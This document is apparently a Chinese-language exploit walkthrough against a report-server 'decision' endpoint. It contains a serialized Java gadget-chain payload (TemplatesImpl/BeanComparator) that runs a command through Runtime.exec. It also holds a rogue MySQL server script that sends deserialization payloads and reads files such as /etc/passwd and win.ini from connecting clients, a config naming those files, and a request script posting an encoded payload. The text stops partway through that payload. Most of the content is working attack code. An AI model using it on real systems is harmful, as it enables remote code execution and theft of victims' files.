116, 114, 97, 110, 115, 108, 101, 116, 73, 110, 100, 101, 120, 91, 0, 10, 95, 98, 121, 116, 101, 99, 111, 100, 101, 115, 116, 0, 3, 91, 91, 66, 91, 0, 6, 95, 99, 108, 97, 115, 115, 116, 0, 18, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 67, 108, 97, 115, 
115, 59, 76, 0, 5, 95, 110, 97, 109, 101, 113, 0, 126, 0, 4, 76, 0, 17, 95, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 59, 120, 112, 0, 0, 0, 0, -1, -1, -1, -1, 117, 114, 0, 3, 91, 91, 66, 75, -3, 25, 21, 103, 103, -37, 55, 2, 0, 0, 120, 112, 0, 0, 0, 1, 117, 114, 0, 2, 91, 66, -84, -13, 23, -8, 6, 8, 84, -32, 2, 0, 0, 120, 112, 0, 0, 5, -24, -54, -2, -70, -66, 0, 0, 0, 51, 0, 52, 10, 0, 8, 0, 36, 10, 0, 37, 0, 38, 8, 0, 39, 10, 0, 37, 0, 40, 7, 0, 41, 10, 0, 5, 0, 42, 7, 0, 43, 7, 0, 44, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 18, 76, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 59, 1, 0, 9, 116, 114, 97, 110, 115, 102, 111, 114, 109, 1, 0, 114, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 100, 111, 99, 117, 109, 101, 110, 116, 1, 0, 45, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 1, 0, 8, 104, 97, 110, 100, 108, 101, 114, 115, 1, 0, 66, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 
112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 10, 69, 120, 99, 101, 112, 116, 105, 111, 110, 115, 7, 0, 45, 1, 0, -90, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 105, 116, 101, 114, 97, 116, 111, 114, 1, 0, 53, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 1, 0, 7, 104, 97, 110, 100, 108, 101, 114, 1, 0, 65, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 8, 60, 99, 108, 105, 110, 105, 116, 62, 1, 0, 1, 101, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 41, 1, 0, 10, 
83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 9, 67, 97, 108, 99, 46, 106, 97, 118, 97, 12, 0, 9, 0, 10, 7, 0, 46, 12, 0, 47, 0, 48, 1, 0, 4, 99, 97, 108, 99, 12, 0, 49, 0, 50, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 51, 0, 10, 1, 0, 16, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 1, 0, 64, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 114, 117, 110, 116, 105, 109, 101, 47, 65, 98, 115, 116, 114, 97, 99, 116, 84, 114, 97, 110, 115, 108, 101, 116, 1, 0, 57, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 84, 114, 97, 110, 115, 108, 101, 116, 69, 120, 99, 101, 112, 116, 105, 111, 110, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 4, 101, 120, 101, 99, 1, 0, 39, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 0, 33, 0, 7, 0, 8, 0, 0, 0, 0, 0, 4, 0, 1, 0, 9, 0, 10, 0, 1, 0, 11, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 13, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 14, 0, 15, 0, 0, 0, 1, 0, 16, 0, 17, 0, 2, 0, 11, 0, 0, 0, 63, 0, 0, 0, 3, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 22, 0, 13, 0, 0, 0, 32, 0, 3, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 20, 0, 21, 0, 2, 0, 
22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 1, 0, 16, 0, 24, 0, 2, 0, 11, 0, 0, 0, 73, 0, 0, 0, 4, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 25, 0, 13, 0, 0, 0, 42, 0, 4, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 25, 0, 26, 0, 2, 0, 0, 0, 1, 0, 27, 0, 28, 0, 3, 0, 22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 8, 0, 29, 0, 10, 0, 1, 0, 11, 0, 0, 0, 97, 0, 2, 0, 1, 0, 0, 0, 18, -72, 0, 2, 18, 3, -74, 0, 4, 87, -89, 0, 8, 75, 42, -74, 0, 6, -79, 0, 1, 0, 0, 0, 9, 0, 12, 0, 5, 0, 3, 0, 12, 0, 0, 0, 22, 0, 5, 0, 0, 0, 14, 0, 9, 0, 17, 0, 12, 0, 15, 0, 13, 0, 16, 0, 17, 0, 18, 0, 13, 0, 0, 0, 12, 0, 1, 0, 13, 0, 4, 0, 30, 0, 31, 0, 0, 0, 32, 0, 0, 0, 7, 0, 2, 76, 7, 0, 33, 4, 0, 1, 0, 34, 0, 0, 0, 2, 0, 35, 112, 116, 0, 18, 110, 97, 109, 101, 53, 53, 48, 54, 57, 49, 56, 53, 51, 56, 52, 55, 48, 48, 112, 119, 1, 0, 120, 113, 0, 126, 0, 13, 120};
//输出16进行字符串,为mysql反序列化自定义数据做准备,
StringBuilder sb = new StringBuilder();
for (byte b : bytes) {
sb.append(String.format("%02x", b));
}
System.out.println(sb.toString());
//aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870000000027372002b6f72672e6170616368652e636f6d6d6f6e732e6265616e7574696c732e4265616e436f6d70617261746f72e3a188ea7322a4480200024c000a636f6d70617261746f7271007e00014c000870726f70657274797400124c6a6176612f6c616e672f537472696e673b78707372002a6a6176612e6c616e672e537472696e672443617365496e73656e736974697665436f6d70617261746f7277035c7d5c50e5ce02000078707400106f757470757450726f706572746965737704000000037372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c6173737400125b4c6a6176612f6c616e672f436c6173733b4c00055f6e616d6571007e00044c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff757200035b5b424bfd19156767db37020000787000000001757200025b42acf317f8060854e00200007870000005e8cafebabe0000003300340a000800240a002500260800270a002500280700290a0005002a07002b07002c0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100124c6f72672f6578616d706c652f43616c633b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e7307002d0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c
616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100083c636c696e69743e010001650100154c6a6176612f696f2f494f457863657074696f6e3b01000d537461636b4d61705461626c6507002901000a536f7572636546696c6501000943616c632e6a6176610c0009000a07002e0c002f003001000463616c630c003100320100136a6176612f696f2f494f457863657074696f6e0c0033000a0100106f72672f6578616d706c652f43616c63010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c6574010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b01000f7072696e74537461636b547261636500210007000800000000000400010009000a0001000b0000002f00010001000000052ab70001b100000002000c0000000600010000000b000d0000000c000100000005000e000f00000001001000110002000b0000003f0000000300000001b100000002000c00000006000100000016000d00000020000300000001000e000f00000000000100120013000100000001001400150002001600000004000100170001001000180002000b000000490000000400000001b100000002000c00000006000100000019000d0000002a000400000001000e000f000000000001001200130001000000010019001a000200000001001b001c0003001600000004000100170008001d000a0001000b000000610002000100000012b800021203b6000457a700084b2ab60006b1000100000009000c000500
03000c0000001600050000000e00090011000c000f000d001000110012000d0000000c0001000d0004001e001f000000200000000700024c0700210400010022000000020023707400126e616d653535303639313835333834373030707701007871007e000d78
}
}
利用此脚本来搭建mysql服务端,地址:https://github.com/fnmsd/MySQL_Fake_Server
server.py更改为以下脚本,将生成的16进制数据放到mysql服务端中,
import asyncio
import base64
import logging
import signal
import random
# Reinstall the default SIGINT action so Ctrl-C terminates the process outright
# instead of raising KeyboardInterrupt inside the event loop.
signal.signal(signal.SIGINT, signal.SIG_DFL)
from mysqlproto.protocol import start_mysql_server
from mysqlproto.protocol.base import OK, ERR, EOF
from mysqlproto.protocol.flags import Capability
from mysqlproto.protocol.handshake import HandshakeV10, HandshakeResponse41, AuthSwitchRequest
from mysqlproto.protocol.query import ColumnDefinition, ColumnDefinitionList, ResultSet, FileReadPacket
import subprocess
import time
@asyncio.coroutine
def accept_server(server_reader, server_writer):
    """Connection callback: hand the client off to ``handle_server`` and return.

    A Task is created so the handler runs on the loop; the Task object itself
    is not retained (the original let it fall out of scope immediately, too).
    Note this file relies on generator-based coroutines (``asyncio.coroutine``
    / ``yield from``), which were removed in Python 3.11.
    """
    asyncio.Task(handle_server(server_reader, server_writer))
@asyncio.coroutine
def process_fileread(server_reader, server_writer, filename):
    """Ask the connected client to upload ``filename`` and collect what it sends.

    Writes a FileReadPacket naming ``filename`` (the server side of a local-infile
    transfer: a client whose connector has local infile disabled will not comply),
    then reads packets until an empty one marks end of file.  The content is
    previewed on stdout and/or written below ``fileOutputDir`` depending on the
    module globals ``displayFileContentOnScreen`` and ``saveToFile``.

    :param server_reader: mysqlproto reader for this connection
    :param server_writer: mysqlproto writer for this connection
    :param filename: path (bytes) to request from the client
    """
    print("Start Reading File:" + filename.decode('utf8'))
    FileReadPacket(filename).write(server_writer)
    yield from server_writer.drain()
    # server_writer.reset()
    # time.sleep(3)
    isFinish = False
    outContent = b''
    # Output name: <fileOutputDir>/<peer address>___<unix time>___<requested path>.
    # '/', '\\' and ':' in the requested path are replaced so it cannot be read as
    # a directory path; the peer address is used as-is.  filename.decode('ascii')
    # raises UnicodeDecodeError for a non-ASCII path.
    outputFileName = "%s/%s___%d___%s" % (
        fileOutputDir, server_writer.get_extra_info('peername')[:2][0], int(time.time()),
        filename.decode('ascii').replace('/', '_').replace('\\', '_').replace(':', '_'))
    while not isFinish:
        packet = server_reader.packet()
        while True:
            fileData = (yield from packet.read())
            # No unread data left in the current packet.
            # NOTE(review): fileData is bytes (it is concatenated into outContent
            # below), so comparing it with the str '' can never be true; this
            # branch is dead and presumably the b'' test below covers that case.
            if fileData == '':
                break
            # Empty packet: the client has finished sending the file.
            if fileData == b'':
                isFinish = True
                break
            outContent += fileData
    if len(outContent) == 0:
        print("Nothing had been read")
    else:
        if displayFileContentOnScreen:
            print("========File Conntent Preview=========")
            try:
                print(outContent.decode('utf8')[:1000])
            except Exception as e:
                # print(e)
                # Not valid UTF-8: fall back to printing the raw bytes.
                print(outContent[:1000])
            print("=======File Conntent Preview End==========")
        if saveToFile:
            with open(outputFileName, 'wb') as f:
                f.write(outContent)
            print("Save to File:" + outputFileName)
    # OK(capability, handshake.status).write(server_writer)
    # server_writer.close()
    return
@asyncio.coroutine
def handle_server(server_reader, server_writer):
    """Drive one client connection: handshake, optional auth switch, command loop.

    After the handshake the behaviour is keyed on the *login username*, not on
    the SQL the client sends: ``fileread_<path>`` and keys of ``fileread_dict``
    send a file-read request back to the client; keys of ``yso_dict`` and
    ``yso_<type>_<cmd>`` names answer query packets (cmd == 3, COM_QUERY) with a
    three-column result set whose middle column is a serialized-object string;
    every other username falls back to requesting a random entry of
    ``defaultFiles``.  Whoever controls the username in the client's JDBC URL
    therefore selects the path taken.  On the client side the serialized column
    only becomes an object when the connector is configured to deserialize
    result columns (the autoDeserialize-style options seen in the JDBC URL later
    in this write-up), which is the setting to audit.

    Reads module globals fileread_dict, yso_dict, defaultFiles.  A ``_clear``
    suffix on the username requests a switch to mysql_clear_password.  Returns
    when the client stops sending command packets.
    """
    handshake = HandshakeV10()
    handshake.write(server_writer)
    print("Incoming Connection:" + str(server_writer.get_extra_info('peername')[:2]))
    yield from server_writer.drain()
    switch2clear = False
    handshake_response = yield from HandshakeResponse41.read(server_reader.packet(), handshake.capability)
    username = handshake_response.user
    print("Login Username:" + username.decode("ascii"))
    # print("<=", handshake_response.__dict__)
    # Check whether the client asked (via a "_clear" username suffix) to be
    # switched to mysql_clear_password.
    if username.endswith(b"_clear"):
        switch2clear = True
        username = username[:-len("_clear")]
    capability = handshake_response.capability_effective
    if (Capability.PLUGIN_AUTH in capability and
            handshake.auth_plugin != handshake_response.auth_plugin
            and switch2clear):
        print("Switch Auth Plugin to mysql_clear_password")
        AuthSwitchRequest().write(server_writer)
        yield from server_writer.drain()
        # The reply (a cleartext credential) is only printed, never verified.
        auth_response = yield from server_reader.packet().read()
        print("<=", auth_response)
    # Every login is accepted: no credential is checked anywhere in this handler.
    result = OK(capability, handshake.status)
    result.write(server_writer)
    yield from server_writer.drain()
    while True:
        server_writer.reset()
        packet = server_reader.packet()
        try:
            cmd = (yield from packet.read(1))[0]
        except Exception as _:
            # TODO: this may misbehave ┓( ´∀` )┏
            # Any read failure (client closed the socket, truncated packet) ends
            # this handler; the trailing `pass` is unreachable.
            return
            pass
        print("<=", cmd)
        query = (yield from packet.read())
        # NOTE(review): query is bytes here, so `query != ''` is always true and
        # query is always decoded to str.  The query.decode('ascii') in the
        # 'select 1' branch further down would raise AttributeError if reached.
        if query != '':
            query = query.decode('ascii')
        if username.startswith(b"fileread_"):
            yield from process_fileread(server_reader, server_writer, username[len("fileread_"):])
            result = OK(capability, handshake.status)
            # return
        elif username in fileread_dict:
            # query =(yield from packet.read())
            yield from process_fileread(server_reader, server_writer, fileread_dict[username])
            result = OK(capability, handshake.status)
            # return
        elif username not in yso_dict and not username.startswith(b"yso_"):
            # query =(yield from packet.read())
            # Any other username: request a random default file instead.
            # random.choice raises IndexError when defaultFiles is empty.
            yield from process_fileread(server_reader, server_writer, random.choice(defaultFiles))
            result = OK(capability, handshake.status)
            print("使用yso了")
        elif cmd == 1:
            # cmd 1 is COM_QUIT in the MySQL protocol; answered with an ERR packet here.
            result = ERR(capability)
            # return
        elif cmd == 3:
            # query = (yield from packet.read()).decode('ascii')
            if 'SHOW VARIABLES'.lower() in query.lower():
                # Fixed two-column result set imitating a server's variables.
                print("Sending Fake MySQL Server Environment Data")
                ColumnDefinitionList((ColumnDefinition('d'), ColumnDefinition('e'))).write(server_writer)
                EOF(capability, handshake.status).write(server_writer)
                ResultSet(("max_allowed_packet", "67108864")).write(server_writer)
                ResultSet(("system_time_zone", "UTC")).write(server_writer)
                ResultSet(("time_zone", "SYSTEM")).write(server_writer)
                ResultSet(("init_connect", "")).write(server_writer)
                ResultSet(("auto_increment_increment", "1")).write(server_writer)
                result = EOF(capability, handshake.status)
            elif username in yso_dict:
                # Serial Data
                # Three-column row; column b carries the pre-built string from yso_dict.
                print("Sending Presetting YSO Data with username " + username.decode('ascii'))
                ColumnDefinitionList((ColumnDefinition('a'), ColumnDefinition('b'), ColumnDefinition('c'))).write(
                    server_writer)
                EOF(capability, handshake.status).write(server_writer)
                ResultSet(("11", yso_dict[username], "2333")).write(server_writer)
                result = EOF(capability, handshake.status)
            elif username.startswith(b"yso_"):
                # Re-reads the already-consumed packet; the value is not used below
                # (presumably left over from an earlier layout of this branch).
                query = (yield from packet.read())
                # Username format: yso_<type>_<command>; ValueError if it has more
                # or fewer than two underscores.
                _, yso_type, yso_command = username.decode('ascii').split("_")
                print("Sending YSO data with params:%s,%s" % (yso_type, yso_command))
                content = get_yso_content(yso_type, yso_command)
                ColumnDefinitionList((ColumnDefinition('a'), ColumnDefinition('b'), ColumnDefinition('c'))).write(
                    server_writer)
                EOF(capability, handshake.status).write(server_writer)
                ResultSet(("11", content, "2333")).write(server_writer)
                result = EOF(capability, handshake.status)
            elif query.decode('ascii') == 'select 1':
                # Unreachable in practice: the username branches above already
                # cover every username that gets this far.
                ColumnDefinitionList((ColumnDefinition('database'),)).write(server_writer)
                EOF(capability, handshake.status).write(server_writer)
                ResultSet(('test',)).write(server_writer)
                result = EOF(capability, handshake.status)
            else:
                result = OK(capability, handshake.status)
        else:
            result = ERR(capability)
        result.write(server_writer)
        yield from server_writer.drain()
# username (bytes) -> serialized payload string; populated by addYsoPaylod()
# from the "yso" section of config.json at startup.
yso_dict = {
}
def get_yso_content(yso_type, command):
    """Return the serialized payload string served for a ``yso_`` login.

    The ysoserial invocation that once produced it is kept commented out; this
    version ignores both arguments and returns a fixed, pre-generated string.
    """
    # popen = subprocess.Popen([javaBinPath, '-jar', ysoserialPath, yso_type, command], stdout=subprocess.PIPE)
    # file_content = popen.stdout.read()
    print("使用了自定义的payload")
    return "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"
def addYsoPaylod(username, yso_type, command):
    """Register the payload for ``username`` (bytes) in the module-level ``yso_dict``."""
    payload = get_yso_content(yso_type, command)
    yso_dict[username] = payload
logging.basicConfig(level=logging.INFO)
# Defaults; each may be overridden from the "config" section of config.json in __main__.
fileOutputDir = "./fileOutput/"      # where content received from clients is stored
displayFileContentOnScreen = True    # print a 1000-character preview to stdout
saveToFile = True                    # persist the received content to fileOutputDir
# username (bytes) -> path (bytes) to request from a client logging in with that name.
fileread_dict = {
}
ysoserialPath = 'ysoserial-0.0.6-SNAPSHOT-all.jar'   # only referenced by the commented-out Popen in get_yso_content
javaBinPath = 'java'
# Paths requested from clients whose username matches nothing else; must be
# non-empty, otherwise random.choice() in handle_server raises IndexError.
defaultFiles = []
if __name__ == "__main__":
    import json
    # config.json (working directory): "config" holds server settings, "fileread"
    # maps usernames to paths plus the "__defaultFiles" list, "yso" is optional.
    with open("config.json") as f:
        data = json.load(f)
    if 'config' in data:
        config_data = data['config']
        if 'ysoserialPath' in config_data:
            ysoserialPath = config_data['ysoserialPath']
        if 'javaBinPath' in config_data:
            javaBinPath = config_data['javaBinPath']
        if 'fileOutputDir' in config_data:
            fileOutputDir = config_data['fileOutputDir']
        if 'displayFileContentOnScreen' in config_data:
            displayFileContentOnScreen = config_data['displayFileContentOnScreen']
        if 'saveToFile' in config_data:
            saveToFile = config_data['saveToFile']
    import os
    try:
        os.makedirs(fileOutputDir)
    except FileExistsError as _:
        pass
    # The "fileread" section is mandatory (KeyError otherwise); keys and values
    # are stored as bytes because usernames arrive as bytes from the handshake.
    for k, v in data['fileread'].items():
        if k == '__defaultFiles':
            defaultFiles = v
            for i in range(len(defaultFiles)):
                defaultFiles[i] = defaultFiles[i].encode('ascii')
        else:
            fileread_dict[k.encode('ascii')] = v.encode('ascii')
    # print(fileread_dict)
    if "yso" in data:
        for k, v in data['yso'].items():
            addYsoPaylod(k.encode('ascii'), v[0], v[1])
    # print(yso_dict)
    loop = asyncio.get_event_loop()
    # host=None presumably means "all interfaces" in mysqlproto — confirm before
    # running this anywhere other than an isolated lab network.
    f = start_mysql_server(handle_server, host=None, port=3306)
    print("===========================================")
    print("MySQL Fake Server")
    print("Author:fnmsd(https://blog.csdn.net/fnmsd)")
    print("Load %d Fileread usernames :%s" % (len(fileread_dict), list(fileread_dict.keys())))
    print("Load %d yso usernames :%s" % (len(yso_dict), list(yso_dict.keys())))
    print("Load %d Default Files :%s" % (len(defaultFiles), defaultFiles))
    print("Start Server at port 3306")
    loop.run_until_complete(f)
    loop.run_forever()
并将config.json中的__defaultFiles改为想要读取的文件,
{
"config":{
"ysoserialPath":"D:\\nettools\\ysoserial\\ysoserial-all.jar",
"javaBinPath":"java",
"fileOutputDir":"./fileOutput/",
"displayFileContentOnScreen":true,
"saveToFile":true
},
"fileread":{
"win_ini":"c:\\windows\\win.ini",
"win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
"win":"c:\\windows\\",
"linux_passwd":"/etc/passwd",
"linux_hosts":"/etc/hosts",
"index_php":"index.php",
"ssrf":"https://www.baidu.com/",
"__defaultFiles":["D:/1.txt"]
},
"yso":{
"Jdk7u21":["Jdk7u21",""]
}
}
将生成的base64序列化数据放入python脚本中运行,
# -*-coding:UTF-8 -*-
import base64
import requests
# Request target and headers replayed from a captured request.  The body posted
# below is base64-decoded binary, not JSON, despite the content-type header;
# 'X-For-Forwarded' is kept exactly as captured (it is not the standard
# X-Forwarded-For spelling).
burp0_url = "http://127.0.0.1:37799/webroot/decision/remote/design/channel"
burp0_headers = {
    'Host':'127.0.0.1:37799',
    'User-Agent':'Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:120.0)Gecko/20100101Firefox/120.0',
    'Accept':'application/json,text/javascript,*/*;q=0.01',
    'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding':'gzip,deflate',
    'content-type':'application/json',
    'x-requested-with':'XMLHttpRequest',
    'Connection':'close',
    'X-For-Forwarded': '127.0.0.1',
    'Referer':'http://127.0.0.1:37799/webroot/decision',
}
b = b"H4sIAAAAAAAAAKUZW2wcV/WuYyeO7fgVx47zagqJaUm768R5NZZJNmu72e0mdr1OAw6ouTtzvTvx7NzxnTvxbkAo/SgP8VEkilSEEKjio0ArfpAoQghQPkB8IEDqDz9UgIQoKhIICQmQyjn3zuzMPuw47Vhe7z3ve86555w7fv1d0uUJsvc2vUOTvrTs5BXqlSUt2mzvjweOP5r785s7SMc86bE5NeepIbnIkt2yLJhX5rZZdS9eIvh0b3TDZy/8doC4J1FcNeltWE4peT07y1apb0vv2DKryrRjXnVYhTuWgaquUvcn/3h36Y3//mqkg5CqIEONpgC+a9fvf35/9NZvt2VInzJkEH4TYMg+g1eSqyJ52+NOMldYuJYWgtaW/vX31w588esLHSSRJ5225UlJBvOoN4V6U3mATFfdRr8oTsRUX/jd4a/9gn5jB0lkSadn3WVVF9VtdCql6+SzpDu2FuR0YIQsW8JMUtsq0iJNmsK3zKTLuZ2s0uQsrj6enqWSFrgvDEb0k1A27i6f0luuSTKsDbWpU0otFG8zA0wVJPUgHUpBO/EnsqQXZFt3WIb7jsySHr1aZHQtR/qjxbJVYTnSY9jc06Q5MqAWiLhq2eDHFbJTQcwc6TO444BxgdABQzAq2TL11gLePtPyDCpMtQRG5mDSrZDda4y5aRuUZsne+vdMmRlrAemwzUuz1uoqE8yRy5AB1FwhA5Uio84SK0GEAAEW7HW4nKu4slawSg61A7VDIfQGtWQ72DXqcC9LxuIwrSTYymgrBt2TJX3oaMj4gK43WGpHDsRW2pN9ghk1ww59OSLgUNxh6SJ1TO6w0C8DkOBMFiSVc4GDxnyPPW3zIrWjcCI+T4YCn88JwYXil+SxWF4D2vAFei1FJa9YRiqt/uS5U5q+SXoDdos7niTnb+Yhp1KrIqVyKhXkVErlVAp3k1I5lakzXYFzyMR0nozqYEcY7SVJrmxPZLSvY5m2kkBHv9mweUlObyXbA5JUziwajS4DOWMm86TgtVZjsw9t7Gx7UeiRQEvBKDPTt5mY96UvmCQT7cMT0pmaDiT0BhLwBEky835tQ3YI9SC7Y+HZrMcbq9ZAnuyxHEvOVQ3mIlSSMW2et26nCs/m6wj0P1KCD421ZUEN1liXClJAqqPVSMXMPJVGWZLj7TerMnWWbziKTHNBwByDPcNqaNjoTTISVYIWo/uhHmA0vTBylx7aO/kGCWDCPpcJi5uzTDYmxdMPLXqxnSDQMBQc/+iw4nb686RHnfgIAtX93Laqe7oIIYZ63a7Kl1fIh6lhMM9b5tcdOKZ2TV